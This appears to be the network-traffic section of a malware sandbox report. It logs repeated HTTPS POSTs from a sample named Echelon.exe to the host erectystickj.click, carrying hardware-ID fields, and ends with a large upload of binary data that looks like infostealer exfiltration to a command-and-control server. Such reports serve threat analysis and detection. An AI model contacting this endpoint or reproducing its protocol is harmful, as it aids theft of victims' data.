                                                                                      2024-12-23 01:29:14 UTC1369INData Raw: 48 78 79 48 7a 51 43 62 78 50 2b 6e 67 50 33 4a 35 77 31 69 6c 4f 30 41 54 57 72 67 7a 58 59 34 53 55 73 61 75 65 65 75 78 64 58 4d 6d 68 75 46 77 78 78 48 76 79 50 4c 49 51 4b 6a 44 65 48 52 76 41 6e 63 76 54 4b 4c 4a 57 72 58 43 4a 69 6f 65 47 74 42 77 45 79 4e 44 39 69 56 79 39 43 6f 4d 78 75 6e 6e 6e 4a 50 73 4e 45 38 68 63 31 76 5a 46 30 32 4b 74 63 4e 47 4c 67 6f 75 64 46 53 58 45 6d 4c 57 55 78 51 54 44 77 6a 7a 7a 45 49 70 63 66 73 30 69 78 44 33 76 69 31 53 76 59 39 31 78 6a 59 76 2b 59 74 52 38 50 54 58 35 75 4f 6b 38 6e 55 4d 36 61 4d 38 63 75 6a 54 44 41 66 62 6b 58 64 4f 6a 49 4e 74 71 34 45 58 77 6c 35 2b 2b 31 55 51 38 71 59 47 42 69 43 32 35 51 6f 38 6c 76 6b 6e 7a 49 64 74 30 50 72 55 39 73 70 64 56 36 77 4f 74 53 4c 44 44 6e 2b 62 55 51
                                                                                      Data Ascii: HxyHzQCbxP+ngP3J5w1ilO0ATWrgzXY4SUsaueeuxdXMmhuFwxxHvyPLIQKjDeHRvAncvTKLJWrXCJioeGtBwEyND9iVy9CoMxunnnJPsNE8hc1vZF02KtcNGLgoudFSXEmLWUxQTDwjzzEIpcfs0ixD3vi1SvY91xjYv+YtR8PTX5uOk8nUM6aM8cujTDAfbkXdOjINtq4EXwl5++1UQ8qYGBiC25Qo8lvknzIdt0PrU9spdV6wOtSLDDn+bUQ
                                                                                      2024-12-23 01:29:14 UTC1369INData Raw: 73 68 48 6e 77 51 38 4e 6c 7a 69 53 2f 62 65 64 38 54 38 67 56 6b 70 5a 74 71 79 75 4a 4a 50 33 58 33 38 2b 6f 5a 56 6a 49 6d 62 6e 70 64 4d 56 44 70 32 57 57 4a 62 70 67 7a 6e 31 75 78 46 33 61 69 2f 51 53 2b 75 68 74 71 49 61 6d 32 35 42 56 67 63 54 73 69 4c 67 68 70 4c 73 57 4d 50 73 63 6e 6e 44 65 63 48 66 78 42 65 71 57 62 41 39 69 6f 46 6d 74 75 37 2b 33 6b 52 45 46 35 4a 69 6c 69 4d 44 46 51 34 39 6c 6c 69 52 79 59 4c 34 4e 61 70 42 41 34 77 38 41 39 6e 72 6f 53 65 7a 50 6e 37 37 56 52 44 79 70 69 59 47 49 4c 62 6c 43 6a 79 57 2b 53 66 4d 68 32 33 51 2b 74 54 32 79 6c 31 58 72 41 36 6c 49 73 4d 4f 66 35 74 52 42 42 66 7a 45 74 4c 41 78 74 41 76 32 61 4b 38 70 75 70 52 2b 6f 55 4c 38 45 65 2b 4c 39 42 4c 6d 7a 44 47 45 74 6f 4a 2f 4c 59 46 35 31 49
                                                                                      Data Ascii: shHnwQ8NlziS/bed8T8gVkpZtqyuJJP3X38+oZVjImbnpdMVDp2WWJbpgzn1uxF3ai/QS+uhtqIam25BVgcTsiLghpLsWMPscnnDecHfxBeqWbA9ioFmtu7+3kREF5JiliMDFQ49lliRyYL4NapBA4w8A9nroSezPn77VRDypiYGILblCjyW+SfMh23Q+tT2yl1XrA6lIsMOf5tRBBfzEtLAxtAv2aK8pupR+oUL8Ee+L9BLmzDGEtoJ/LYF51I


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549709172.67.154.1664433356C:\Users\user\Desktop\Echelon.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 01:29:16 UTC279OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=68TR9TI6M5OBM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 12810
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:16 UTC12810OUTData Raw: 2d 2d 36 38 54 52 39 54 49 36 4d 35 4f 42 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 41 36 42 46 36 30 38 39 43 33 32 36 43 34 38 30 34 30 43 46 38 31 36 43 30 38 42 31 44 44 34 0d 0a 2d 2d 36 38 54 52 39 54 49 36 4d 35 4f 42 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 38 54 52 39 54 49 36 4d 35 4f 42 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 0d 0a 2d 2d 36 38 54 52 39 54
                                                                                      Data Ascii: --68TR9TI6M5OBMContent-Disposition: form-data; name="hwid"0A6BF6089C326C48040CF816C08B1DD4--68TR9TI6M5OBMContent-Disposition: form-data; name="pid"2--68TR9TI6M5OBMContent-Disposition: form-data; name="lid"yau6Na--1816906785--68TR9T
                                                                                      2024-12-23 01:29:17 UTC1139INHTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:17 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=pkqhtlvdk4se3clgsktp1sjrbb; expires=Thu, 17 Apr 2025 19:15:55 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2FspnR8oChNHLC9tEqp5JU6Uckz82NMjStd%2Fk9dWdb4vw2BLbGNHD6lllkPI4v1xjE%2FpQCa2ekasMfswwXlKjtRGjpMyrUKn3MmbFGCn%2FDAmEeWl5hne%2B2Z5%2BXjnf8O60upJKG8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494661e8e5e60-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1713&rtt_var=654&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13747&delivery_rate=1660034&cwnd=248&unsent_bytes=0&cid=ac157fb5f26a4d24&ts=916&x=0"
                                                                                      2024-12-23 01:29:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-23 01:29:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.549712172.67.154.1664433356C:\Users\user\Desktop\Echelon.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 01:29:18 UTC281OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=17ILINSQ6U41R2E
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 15064
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:18 UTC15064OUTData Raw: 2d 2d 31 37 49 4c 49 4e 53 51 36 55 34 31 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 41 36 42 46 36 30 38 39 43 33 32 36 43 34 38 30 34 30 43 46 38 31 36 43 30 38 42 31 44 44 34 0d 0a 2d 2d 31 37 49 4c 49 4e 53 51 36 55 34 31 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 37 49 4c 49 4e 53 51 36 55 34 31 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 0d 0a 2d 2d
                                                                                      Data Ascii: --17ILINSQ6U41R2EContent-Disposition: form-data; name="hwid"0A6BF6089C326C48040CF816C08B1DD4--17ILINSQ6U41R2EContent-Disposition: form-data; name="pid"2--17ILINSQ6U41R2EContent-Disposition: form-data; name="lid"yau6Na--1816906785--
                                                                                      2024-12-23 01:29:19 UTC1129INHTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:19 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=527hqib1mermd3kvp80djaol9h; expires=Thu, 17 Apr 2025 19:15:58 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xYPvQQHgdb5xSdrc1l588wzZEOcXLDn5XygQVes77BQigH%2BC8WeKQt1S2ncEfTGNXMVdrPwpPL8kon2IOeCV6vB0K66c%2BKET9ZYQDeAVN8GTz18MrxM766KHauxKwz83iAPupJU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494742f7ade97-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1538&rtt_var=590&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2847&recv_bytes=16003&delivery_rate=1835323&cwnd=231&unsent_bytes=0&cid=9f19cf8fabe441f4&ts=937&x=0"
                                                                                      2024-12-23 01:29:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-23 01:29:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.549716172.67.154.1664433356C:\Users\user\Desktop\Echelon.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 01:29:21 UTC277OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=4OZW1KMF1ZD
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 20530
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:21 UTC15331OUTData Raw: 2d 2d 34 4f 5a 57 31 4b 4d 46 31 5a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 41 36 42 46 36 30 38 39 43 33 32 36 43 34 38 30 34 30 43 46 38 31 36 43 30 38 42 31 44 44 34 0d 0a 2d 2d 34 4f 5a 57 31 4b 4d 46 31 5a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 4f 5a 57 31 4b 4d 46 31 5a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 0d 0a 2d 2d 34 4f 5a 57 31 4b 4d 46 31 5a 44 0d
                                                                                      Data Ascii: --4OZW1KMF1ZDContent-Disposition: form-data; name="hwid"0A6BF6089C326C48040CF816C08B1DD4--4OZW1KMF1ZDContent-Disposition: form-data; name="pid"3--4OZW1KMF1ZDContent-Disposition: form-data; name="lid"yau6Na--1816906785--4OZW1KMF1ZD
                                                                                      2024-12-23 01:29:21 UTC5199OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: un 4F([:7s~X`nO`i
                                                                                      2024-12-23 01:29:22 UTC1134INHTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:22 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=tnp6u12f274mufcjeqpnkrpkqq; expires=Thu, 17 Apr 2025 19:16:01 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=anV%2B4Zm6c66OZrXwNGG87xp%2FTFy4g02BGLvXIEXSp8ofDdk7tjEC%2FuJa9vqqsiylvb67bUGfEZMr%2FpEedOrHlbmXQbxa%2FhaPXytff6QTx1zU78njpunlJIO6utVOF3cUWKyC3O0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494870dcc4344-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1752&rtt_var=672&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21487&delivery_rate=1611479&cwnd=47&unsent_bytes=0&cid=f154af65d188bea6&ts=961&x=0"
                                                                                      2024-12-23 01:29:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-23 01:29:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.549723172.67.154.1664433356C:\Users\user\Desktop\Echelon.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 01:29:24 UTC281OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=FIS1F4GASLGQZWSM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1252
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:24 UTC1252OUTData Raw: 2d 2d 46 49 53 31 46 34 47 41 53 4c 47 51 5a 57 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 41 36 42 46 36 30 38 39 43 33 32 36 43 34 38 30 34 30 43 46 38 31 36 43 30 38 42 31 44 44 34 0d 0a 2d 2d 46 49 53 31 46 34 47 41 53 4c 47 51 5a 57 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 49 53 31 46 34 47 41 53 4c 47 51 5a 57 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 0d
                                                                                      Data Ascii: --FIS1F4GASLGQZWSMContent-Disposition: form-data; name="hwid"0A6BF6089C326C48040CF816C08B1DD4--FIS1F4GASLGQZWSMContent-Disposition: form-data; name="pid"1--FIS1F4GASLGQZWSMContent-Disposition: form-data; name="lid"yau6Na--1816906785
                                                                                      2024-12-23 01:29:25 UTC1138INHTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=i334ejgl9fr44u7lgjrvhtoodf; expires=Thu, 17 Apr 2025 19:16:04 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YX%2BQ%2FINwEVYuluww%2BPfbbPYq64h22RF2Ja09P9Mc1KGt8gYc9QeRSmGw2SKzkbjZPuRjUG3igYza%2Bi77S036%2B8J8D%2BZdHqQzoS0sCYPYLGuSJ3jTvP7f74TKoG6JH%2BzXSmY%2FNOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f64949b4a4141f5-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1695&rtt_var=637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2169&delivery_rate=1722713&cwnd=211&unsent_bytes=0&cid=f6459adbcf0a20ff&ts=801&x=0"
                                                                                      2024-12-23 01:29:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-23 01:29:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.549733172.67.154.1664433356C:\Users\user\Desktop\Echelon.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 01:29:27 UTC279OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=9ZAVLE8JOVKM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 570028
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: 2d 2d 39 5a 41 56 4c 45 38 4a 4f 56 4b 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 41 36 42 46 36 30 38 39 43 33 32 36 43 34 38 30 34 30 43 46 38 31 36 43 30 38 42 31 44 44 34 0d 0a 2d 2d 39 5a 41 56 4c 45 38 4a 4f 56 4b 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 5a 41 56 4c 45 38 4a 4f 56 4b 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 0d 0a 2d 2d 39 5a 41 56 4c 45 38 4a 4f
                                                                                      Data Ascii: --9ZAVLE8JOVKMContent-Disposition: form-data; name="hwid"0A6BF6089C326C48040CF816C08B1DD4--9ZAVLE8JOVKMContent-Disposition: form-data; name="pid"1--9ZAVLE8JOVKMContent-Disposition: form-data; name="lid"yau6Na--1816906785--9ZAVLE8JO
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: 30 1f ef cf ce 97 43 ad 2a ae 1f 35 fe 93 2b d1 68 5a e0 86 6d a0 d7 3b 69 90 34 9f dc 48 94 a1 26 49 fd ae 15 64 d1 20 cc b3 b5 dc 68 e8 6d 9f fa 98 80 cb b9 55 c8 3b ad 01 5e 1a 11 d6 e5 08 dd d3 7d 4c 71 5a 30 4b 75 c3 4c 69 f7 c2 93 b8 ce 92 1c 2c ac b7 64 91 5b b4 33 e1 e5 76 3a 6f 72 86 52 25 3b 5d a2 b8 7a 8f 15 9e 35 c7 0a 54 09 d9 35 53 be 1d a6 c2 c6 fc 40 6d c2 b1 d3 6a 1c 9a 3a c1 bc 85 5b 14 03 df 8a f0 2c f6 1d 21 ff 83 b1 6b b7 f4 11 1d d6 10 1e 92 a8 9e b8 d5 18 d0 8e db 7c 47 9c 7b 1f a7 89 8f 46 6d 15 0a 26 9c 62 62 c8 ce 1f 9e 25 5a 1c d7 bd b2 04 39 b6 5b d4 a4 06 d7 2c db f2 a3 38 19 a3 a4 bc d8 f9 3b 23 0a cd 77 59 66 13 8d 9b ba 16 ef d7 d4 33 aa 43 fd 92 20 73 3c 59 3e 38 14 9e 42 1d fd a7 29 8d a7 8a a2 96 80 a5 75 46 df a0 22 2d
                                                                                      Data Ascii: 0C*5+hZm;i4H&Id hmU;^}LqZ0KuLi,d[3v:orR%;]z5T5S@mj:[,!k|G{Fm&bb%Z9[,8;#wYf3C s<Y>8B)uF"-
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: cd 14 22 55 23 92 7b 6b 5a dd 89 93 cf 3a d2 6c 2c b5 70 7e 5c f1 b8 21 81 b0 fb 4e 35 39 96 b4 94 dc 1f e9 7d ff 07 23 4a 96 3f 21 12 32 50 43 29 e5 29 b7 3b fe d7 6d 72 34 cc 33 df 2f 34 dc c7 0e 4a 47 19 05 aa 07 9b 35 04 15 11 30 6c b1 ae c7 5f 56 94 13 22 6b 8c 10 5e e5 44 b8 55 6f 95 fe 3c 9a f3 a4 54 18 da 24 f0 76 b9 da 25 f2 11 86 15 6c 18 a1 01 51 eb 6f 9a ef 88 06 16 ab ae 36 07 d0 d1 bb 86 ca 54 e4 8a b6 e2 77 2a 86 c2 5e 63 8a 03 c1 d6 6f 03 a7 15 ac d6 5f 31 2c 7e 6d c4 da ec 46 ed 50 3d bb bd 91 e7 3f ea ec 9a 9b 18 5f 1a 79 67 fd 71 f9 fa 58 e2 c0 c9 43 03 3f 03 d7 df 32 3c d9 5f 9e fd 96 50 b7 1d 3c 00 2a 16 56 ed 4b 54 ae db 8c b6 a6 06 3e d4 ff f5 df 59 d4 da e6 a0 b4 64 d9 1d bb 9f ff cc 6b 2b fc 6d cb 76 3b dd 1d 28 26 39 77 08 e5 17
                                                                                      Data Ascii: "U#{kZ:l,p~\!N59}#J?!2PC));mr43/4JG50l_V"k^DUo<T$v%lQo6Tw*^co_1,~mFP=?_ygqXC?2<_P<*VKT>Ydk+mv;(&9w
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: 8a 7e da d8 7d 1c ac f0 4d 94 b5 37 11 24 1e 01 d3 5a 18 69 15 90 32 35 b0 4a a2 ea ef 1c b4 59 24 8c 49 df b8 d1 41 d3 c2 24 ba 81 5e 02 11 03 2e 1f 57 fb 7e 08 93 af 75 5a 83 68 01 74 ce e2 7b 0f 00 e5 48 f8 75 03 c3 52 3e b3 92 7b 46 99 61 f6 81 84 88 16 6d 37 28 41 0b e4 bb 73 54 20 38 9e 40 b9 c4 3c 05 51 15 2e ac 67 23 33 66 f9 13 c1 44 19 74 f9 63 43 d5 e7 dd e4 a9 10 db d9 9b 47 90 ca c3 29 21 46 f9 b2 c1 16 f2 cf b7 26 a6 22 af 07 8a ad 0c 4a f8 eb cf 50 cb 9d 08 90 ca fc 3d 88 02 0c 19 75 77 b6 c8 a9 fa a8 37 05 7b 49 dd 7b 2d d4 72 34 b6 a7 e3 c8 f1 ac dc 2d 81 b7 5e c6 ad 5b f7 b8 0f 51 80 b1 28 dd 2a 0e d3 1f 04 fb 41 4d 03 61 84 45 c0 56 5b 13 18 53 e6 1d be af 01 b8 39 67 45 51 96 3f 7c 83 68 bf 04 bb 1f e8 b2 3f 91 48 83 91 98 3b b9 87 df
                                                                                      Data Ascii: ~}M7$Zi25JY$IA$^.W~uZht{HuR>{Fam7(AsT 8@<Q.g#3fDtcCG)!F&"JP=uw7{I{-r4-^[Q(*AMaEV[S9gEQ?|h?H;
                                                                                      2024-12-23 01:29:27 UTC15331OUTData Raw: a4 2b 67 25 9f e1 cf 9e 58 73 ad 8f 16 37 d5 48 eb 69 16 22 36 05 98 7a 56 65 ed 16 88 f6 9e 6c ea 34 73 e4 d9 34 a1 b4 eb ad 2b 83 56 e1 90 f7 63 e3 98 12 52 52 a6 ba 00 10 62 5d 10 23 b9 6d 0f 1b 16 bc 59 b1 71 08 8f da 19 87 bb 40 ee 3b 20 0e e1 23 7a 1a c8 c1 53 6b 3d 12 11 9e f1 ef 5f e9 17 35 85 1e 10 ce 1a e7 4f f5 d1 2f 88 f9 b6 11 8e fb 76 f8 7e e8 cc 07 35 51 de 43 e2 ff ef b4 6b b0 09 a8 a1 18 10 a3 87 4a 85 c2 33 8e 83 cc 88 fa 8f 00 ae bf 00 ab b3 a4 ea 7e 4f 9c 3f 10 cb 30 32 72 29 9c 0a 82 e3 36 1d 53 a3 c3 47 32 36 5f 58 3f e2 e9 30 a3 7f 5f 11 43 c1 dd c3 d9 20 c9 8b ac 87 5a a9 36 83 4d d5 88 ee a9 6b b8 fd 99 01 d8 f4 77 46 7d 62 e5 62 a8 90 20 2c 09 be 59 ea db e3 ea ca 39 00 4a 3a 12 19 ed 4d b7 b7 ab 9a 36 cc 83 dc 32 29 64 fd a9 53
                                                                                      Data Ascii: +g%Xs7Hi"6zVel4s4+VcRRb]#mYq@; #zSk=_5O/v~5QCkJ3~O?02r)6SG26_X?0_C Z6MkwF}bb ,Y9J:M62)dS
